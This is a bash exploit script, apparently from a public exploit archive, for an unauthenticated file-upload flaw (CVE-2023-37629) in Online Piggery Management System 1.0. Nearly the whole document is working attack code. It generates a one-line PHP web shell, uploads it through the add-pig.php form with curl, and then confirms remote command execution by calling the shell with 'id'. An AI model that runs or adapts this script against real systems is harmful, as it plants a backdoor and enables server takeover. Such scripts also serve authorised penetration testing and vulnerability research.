Online Piggery Management System 1.0 Shell Upload

#!/bin/bash# Exploit Title: Online Piggery Management System v1.0 - unauthenticated file upload vulnerability# Date: July 12 2023# Exploit Author: 1337kid# Software Link: https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html# Version: 1.0# Tested on: Ubuntu# CVE : CVE-2023-37629## chmod +x exploit.sh# ./exploit.sh web_url# ./exploit.sh http://127.0.0.1:8080/echo "   _____   _____   ___ __ ___ ____   ________ __ ___ ___ "echo "  / __\\ \\ / / __|_|_  )  \\_  )__ /__|__ /__  / /|_  ) _ \\"echo " | (__ \\ V /| _|___/ / () / / |_ \\___|_ \\ / / _ \\/ /\\_, /"echo "  \\___| \\_/ |___| /___\\__/___|___/  |___//_/\\___/___|/_/ "echo "                         @1337kid"echo if [[ $1 == '' ]]; then    echo "No URL specified!"    exitfibase_url=$1unauth_file_upload() {    # CVE-2023-37629 - File upload vuln    echo "Generating shell.php"#===========cat > shell.php << EOF<?php system(\$_GET['cmd']); ?>EOF#===========    echo "done"    curl -s -F [email protected] -F submit=pwned $base_url/add-pig.php > /dev/null    req=$(curl -s -I $base_url"uploadfolder/shell.php?cmd=id" |  head -1 | awk '{print $2}')    if [[ $req == "200" ]]; then        echo "Shell uploaded to $(echo $base_url)uploadfolder/shell.php"    else        echo "Failed to upload a shell"    fi}req=$(curl -I -s $base_url | head -1 | awk '{print $2}')if [[ $req -eq "200" ]]; then    unauth_file_uploadelse    echo "Error"    echo "Status Code: $req"fi